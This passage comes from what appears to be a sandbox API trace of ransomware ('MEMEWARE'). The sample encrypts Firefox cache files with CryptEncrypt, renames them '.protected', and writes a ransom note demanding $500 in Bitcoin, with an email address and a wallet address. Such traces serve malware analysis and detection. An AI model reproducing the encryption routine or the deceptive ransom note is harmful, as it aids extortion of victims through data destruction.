HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_") returned 107 [0086.400] StrStrW (lpFirst="_CACHE_001_", lpSrch=".txt") returned 0x0 [0086.400] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_") returned 107 [0086.400] StrStrW (lpFirst="_CACHE_001_", lpSrch=".rar") returned 0x0 [0086.400] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_") returned 107 [0086.400] StrStrW (lpFirst="_CACHE_001_", lpSrch=".zip") returned 0x0 [0086.400] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.410] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.410] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.411] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.411] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.441] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.441] CloseHandle (hObject=0x158) returned 1 [0086.442] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_.protected") returned 117 [0086.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_001_.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_.protected")) returned 1 [0086.443] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.443] lstrcmpiW (lpString1="_CACHE_002_", lpString2="Windows") returned -1 [0086.443] lstrcmpiW (lpString1="_CACHE_002_", lpString2="Program Files") returned -1 [0086.443] lstrcmpiW (lpString1="_CACHE_002_", lpString2="Program Files (x86)") returned -1 [0086.443] lstrcmpiW (lpString1="_CACHE_002_", lpString2="$Recycle.bin") returned 1 [0086.443] lstrcmpiW (lpString1="_CACHE_002_", lpString2="System Volume Information") returned -1 [0086.443] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_") returned 107 [0086.443] StrStrIW (lpFirst="_CACHE_002_", lpSrch=".protected") returned 0x0 [0086.443] lstrcmpW (lpString1="_CACHE_002_", lpString2="RESTORE_FILES.txt") returned -1 [0086.443] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.443] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.444] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_") returned 107 [0086.444] StrStrW (lpFirst="_CACHE_002_", lpSrch=".txt") returned 0x0 [0086.445] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_") returned 107 [0086.445] StrStrW (lpFirst="_CACHE_002_", lpSrch=".rar") returned 0x0 [0086.445] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_") returned 107 [0086.445] StrStrW (lpFirst="_CACHE_002_", lpSrch=".zip") returned 0x0 [0086.445] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.446] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.446] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.447] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.447] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.474] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.474] CloseHandle (hObject=0x158) returned 1 [0086.474] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_.protected") returned 117 [0086.474] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_.protected")) returned 1 [0086.475] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.475] lstrcmpiW (lpString1="_CACHE_003_", lpString2="Windows") returned -1 [0086.475] lstrcmpiW (lpString1="_CACHE_003_", lpString2="Program Files") returned -1 [0086.475] lstrcmpiW (lpString1="_CACHE_003_", lpString2="Program Files (x86)") returned -1 [0086.475] lstrcmpiW (lpString1="_CACHE_003_", lpString2="$Recycle.bin") returned 1 [0086.475] lstrcmpiW (lpString1="_CACHE_003_", lpString2="System Volume Information") returned -1 [0086.475] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_") returned 107 [0086.475] StrStrIW (lpFirst="_CACHE_003_", lpSrch=".protected") returned 0x0 [0086.475] lstrcmpW (lpString1="_CACHE_003_", lpString2="RESTORE_FILES.txt") returned -1 [0086.475] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.475] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.477] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_") returned 107 [0086.477] StrStrW (lpFirst="_CACHE_003_", lpSrch=".txt") returned 0x0 [0086.477] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_") returned 107 [0086.477] StrStrW (lpFirst="_CACHE_003_", lpSrch=".rar") returned 0x0 [0086.477] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_") returned 107 [0086.477] StrStrW (lpFirst="_CACHE_003_", lpSrch=".zip") returned 0x0 [0086.477] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.479] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.479] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.502] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.502] CloseHandle (hObject=0x158) returned 1 [0086.502] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_.protected") returned 117 [0086.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_.protected")) returned 1 [0086.503] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.503] lstrcmpiW (lpString1="_CACHE_MAP_", lpString2="Windows") returned -1 [0086.503] lstrcmpiW (lpString1="_CACHE_MAP_", lpString2="Program Files") returned -1 [0086.503] lstrcmpiW (lpString1="_CACHE_MAP_", lpString2="Program Files (x86)") returned -1 [0086.503] lstrcmpiW (lpString1="_CACHE_MAP_", lpString2="$Recycle.bin") returned 1 [0086.503] lstrcmpiW (lpString1="_CACHE_MAP_", lpString2="System Volume Information") returned -1 [0086.503] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_") returned 107 [0086.503] StrStrIW (lpFirst="_CACHE_MAP_", lpSrch=".protected") returned 0x0 [0086.503] lstrcmpW (lpString1="_CACHE_MAP_", lpString2="RESTORE_FILES.txt") returned -1 [0086.503] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.503] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_") returned 107 [0086.505] StrStrW (lpFirst="_CACHE_MAP_", lpSrch=".txt") returned 0x0 [0086.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_") returned 107 [0086.505] StrStrW (lpFirst="_CACHE_MAP_", lpSrch=".rar") returned 0x0 [0086.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_") returned 107 [0086.505] StrStrW (lpFirst="_CACHE_MAP_", lpSrch=".zip") returned 0x0 [0086.505] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2114, lpOverlapped=0x0) returned 1 [0086.516] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdeec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.517] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2114, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2114, lpOverlapped=0x0) returned 1 [0086.517] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.517] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.517] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.517] CloseHandle (hObject=0x158) returned 1 [0086.517] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_.protected") returned 117 [0086.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_.protected")) returned 1 [0086.518] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0086.518] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0086.518] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\RESTORE_FILES.txt") returned 113 [0086.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.519] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.519] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0086.520] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.520] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.520] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.520] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0086.520] CloseHandle (hObject=0x154) returned 1 [0086.520] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.520] lstrcmpiW (lpString1="OfflineCache", lpString2="Windows") returned -1 [0086.520] lstrcmpiW (lpString1="OfflineCache", lpString2="Program Files") returned -1 [0086.520] lstrcmpiW (lpString1="OfflineCache", lpString2="Program Files (x86)") returned -1 [0086.520] lstrcmpiW (lpString1="OfflineCache", lpString2="$Recycle.bin") returned 1 [0086.520] lstrcmpiW (lpString1="OfflineCache", lpString2="System Volume Information") returned -1 [0086.520] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache") returned 102 [0086.520] lstrcmpW (lpString1="OfflineCache", lpString2=".") returned 1 [0086.520] lstrcmpW (lpString1="OfflineCache", lpString2="..") returned 1 [0086.520] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\*") returned 104 [0086.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0086.521] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.521] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.521] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.521] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.521] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.521] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\.") returned 104 [0086.521] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.521] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.522] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.522] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.522] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.522] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.522] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.522] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\..") returned 105 [0086.522] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.522] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.522] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.522] lstrcmpiW (lpString1="index.sqlite", lpString2="Windows") returned -1 [0086.522] lstrcmpiW (lpString1="index.sqlite", lpString2="Program Files") returned -1 [0086.522] lstrcmpiW (lpString1="index.sqlite", lpString2="Program Files (x86)") returned -1 [0086.522] lstrcmpiW (lpString1="index.sqlite", lpString2="$Recycle.bin") returned 1 [0086.522] lstrcmpiW (lpString1="index.sqlite", lpString2="System Volume Information") returned -1 [0086.522] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite") returned 115 [0086.522] StrStrIW (lpFirst="index.sqlite", lpSrch=".protected") returned 0x0 [0086.522] lstrcmpW (lpString1="index.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0086.522] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.522] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 